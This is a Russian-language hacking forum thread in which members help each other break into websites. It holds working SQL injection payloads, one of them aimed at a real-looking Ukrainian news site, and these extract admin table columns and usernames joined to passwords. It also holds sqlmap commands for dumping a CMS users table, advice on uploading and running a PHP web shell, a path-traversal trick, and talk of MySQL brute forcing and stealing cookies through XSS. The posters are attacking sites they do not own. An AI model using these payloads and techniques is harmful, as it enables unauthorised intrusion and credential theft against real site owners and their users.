Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. LelouchMe

    LelouchMe New Member

    Joined:
    31 May 2012
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Всё сделал как там, и?
     
  2. d1v

    d1v Elder - Старейшина

    Joined:
    21 Feb 2009
    Messages:
    676
    Likes Received:
    331
    Reputations:
    120
    не лги мне. читай заново.
     
  3. LelouchMe

    LelouchMe New Member

    Joined:
    31 May 2012
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    да кавычки видно фильтрует вот и всё...(
     
  4. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    842
    Likes Received:
    170
    Reputations:
    84
    Таблицу захекси
    Code:
    http://www.vs.com.ua/a-news/news.php?id=-1+UNION+SELECT+1,2,3,4,5,COLUMN_NAME,7,8,9,10+FROM%20%20INFORMATION_SCHEMA.COLUMNS%20WHERE%20TABLE_NAME%20=0x6161646d5f7573657273+LIMIT+0,1+--+
     
    1 person likes this.
  5. Dmit3Y

    Dmit3Y Member

    Joined:
    19 Jul 2010
    Messages:
    45
    Likes Received:
    8
    Reputations:
    0
    Вопрос по склмап.
    Нашел слепую иньекцию. sqlmap подтвердил что это иньекция, вытащил список бд и всех таблиц. Однако, когда попытался вытащить акк админа (из другой базы. имена взял из вывода склмапа) он что-то странно себя вел.
    Иньекция:
    Code:
    ---
    Place: GET
    Parameter: rec
        Type: AND/OR time-based blind
        Title: MySQL > 5.0.11 AND time-based blind
        Payload: rec=83990 AND SLEEP(5)
    ---
    Пытаюсь получить хоть что-то из бд:
    Code:
    ./sqlmap.py  --url=адрес --sql-query="SELECT name  FROM db_name.dle_users;"
    
    Вывод:
    Code:
    [09:27:24] [WARNING] the SQL query provided does not return any output
    [09:27:24] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' and/or switch '--hex'
    SELECT name FROM db_name.dle_users;:     None
    
    Любые попытки получить информация заканчиваются именно так.
    Один раз был такой вывод:
    Code:
    SELECT user_id FROM db_name.dle_users; [4]:
    [*] B
    [*] 
    [*] !
    [*] A
    
    Что делать? Попытки создать нового пользователя тоже провалились..Я думаю если он увидел список таблиц, то значит права на чтение точно есть. Или я не прав? Тогда должна быть возможность сделать выборку.
     
  6. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    to Dmit3Y
    Code:
    -u "http://site.com/" --dump -D db_name -T dle_users -C name --start 1 --stop 10
     
    1 person likes this.
  7. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Не только TRACE

    http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0053
     
  8. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    to Dad69
    Получение доступа к HttpOnly Cookie через XSS -> Link
     
    2 people like this.
  9. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Существует ли локальный mysql брут?
     
  10. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    Вроде в WSO есть... не?
     
  11. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Точно, попробую. Боюсь только что проблема в том, что возможно он будет вырубаться по таймауту, если брутить долго.
     
  12. boortyhuhtyu

    boortyhuhtyu Member

    Joined:
    2 Feb 2011
    Messages:
    727
    Likes Received:
    26
    Reputations:
    -6
    как из под рута создать домены в Linux сервере?
     
  13. pirat0

    pirat0 Member

    Joined:
    16 Jan 2011
    Messages:
    71
    Likes Received:
    6
    Reputations:
    -1
    такая ситуация:
    есть доступ в админку, есть аплоад файлов, лью shell.php, он заливается на сервер 100%, потому что я его потом через менеджер загрузки вижу среди остальных файлов и даже редактировать могу, перехожу по ссылке на него а серв грит
    Code:
    Невозможно обработать запрос "media/shell.php".
    ps хотя например txt и jpg файлы норм открывает
    ну как-то совсем обидно (( :confused:
     
  14. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,177
    Likes Received:
    617
    Reputations:
    690
    2boortyhuhtyu http://www.debian-blog.ru/web-server/nastrojka-apache2-i-virtualnyx-xostov.html

    2pirat0 ОК!
     
    _________________________
  15. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Попробуй залить ../shell.php :D
     
  16. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108
    Судя по всему жесткое ограничение на путь к директории заливки файла аплоадером и noexec на оной пресекают более-менее стандартные варианты злодеяния.
     
  17. A_n_d_r_e_i

    A_n_d_r_e_i Elder - Старейшина

    Joined:
    2 Sep 2009
    Messages:
    202
    Likes Received:
    276
    Reputations:
    32
    com.microsoft.sqlserver.jdbc.SQLServerException: All queries combined using a UNION, INTERSECT or EXCEPT operator must have the same number of expressions in their target lists.
     
  18. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Не одинаковое кол-во колонок в запросах SELECT и UNION SELECT, если я правильно понял суть Вашего поста!
     
  19. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    Помогите с oracle.
    Как вывести логины и пассы вместе?
    union+select+null,null,password,null,null,null,null+from+users--
    union+select+null,null,username,,null,null,null,null+from+users--

    По отдельности выводит.
     
    _________________________
  20. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Code:
    union+select+null,null,concat(username,password),null,null,null,nul l+from+users--
    Code:
    union+select+null,null,(username || ':' || password)x,null,null,null,nul l+from+users--
     
    #20680 cat1vo, 2 Jul 2012
    Last edited: 2 Jul 2012
    2 people like this.
Thread Status:
Not open for further replies.